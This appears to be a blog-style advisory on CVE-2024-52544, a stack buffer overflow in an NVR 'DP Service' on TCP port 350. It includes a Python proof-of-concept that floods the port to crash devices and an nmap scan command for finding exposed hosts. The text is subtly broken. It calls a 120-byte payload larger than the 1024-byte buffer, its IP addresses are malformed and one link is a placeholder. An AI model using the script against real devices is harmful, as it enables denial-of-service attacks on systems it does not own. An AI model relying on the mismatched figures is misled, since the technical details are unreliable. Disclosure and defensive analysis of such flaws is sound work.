CVE-2024-52544 - Unauthenticated Stack-Based Buffer Overflow in DP Service (Port 350) – Exploit and Analysis

Summary:
A new vulnerability, CVE-2024-52544, was discovered in the DP Service running on TCP port 350. This flaw allows unauthenticated attackers to cause a stack-based buffer overflow, potentially leading to denial of service or remote code execution. The issue was fixed in firmware version 2.800.000000.8.R.20241111. Below, we break down the vulnerability, demonstrate exploitation, and provide important references.

What is CVE-2024-52544?

CVE-2024-52544 is a critical stack-based buffer overflow in the DP Service, a part of some video NVRs (Network Video Recorders) and related devices. Anyone who can reach TCP port 350 can send a malicious payload without authentication and corrupt the device memory, potentially resulting in a crash or the execution of custom attacker code.

Severity: HIGH
Attack Vector: Network
Privileges Required: None
User Interaction: None

Technical Details

The buffer overflow exists because the service does not properly check the length of incoming data before copying it into a fixed-size stack buffer.

Vulnerable code snippet (simplified for clarity)

// Pseudo-source Example
void handle_message(char *data) {
    char buffer[1024];
    // UNSAFE: No check for length of data!
    strcpy(buffer, data);
    // ... process buffer ...
}

If an attacker sends more than 1024 bytes to the DP Service, the extra data will overwrite the stack. This can cause a crash (denial of service) or allow execution of attacker-supplied code.

Step-by-step Exploit (Proof-of-Concept)

Disclaimer: For educational purposes only. Do not use against systems you do not own.

We'll use Python to send an oversized payload to TCP port 350

import socket

TARGET_IP = "192..2.123"  # Replace with target IP
TARGET_PORT = 350

payload = b"A" * 120  # 120 bytes, more than the stack buffer

with socket.create_connection((TARGET_IP, TARGET_PORT)) as s:
    s.send(payload)
    print("Payload sent. If vulnerable, device may freeze or crash.")

What happens?

In theory, by controlling overflow data, you could execute code.

Advanced:
Crafting an actual remote code execution exploit requires knowledge of the system, stack layout, and addresses (often feasible on embedded devices with little protection).

How to Fix

Upgrade firmware:
Patch is in firmware version 2.800.000000.8.R.20241111.
Vendor Advisory / Download *(example link; use vendor advisory)*

- Use tools like nmap to find exposed hosts

  nmap -p 350 192..2./24
  

References

- CVE Record on NVD
- Vendor Advisory
- Stack-based buffer overflows explained – Wikipedia
- Stack Buffer Overflow Exploitation (HackTricks)

Consider disabling the DP Service if not used.

CVE-2024-52544 is a serious vulnerability that allows remote, unauthenticated attackers to crash or even hijack devices over the network. Make sure your devices are up-to-date and not exposed to the public internet.

Stay Safe!

*Written exclusively for your security awareness. If you found this useful, share it with your team and security contacts.*

Timeline

Published on: 12/03/2024 18:15:15 UTC
Last modified on: 12/03/2024 21:15:07 UTC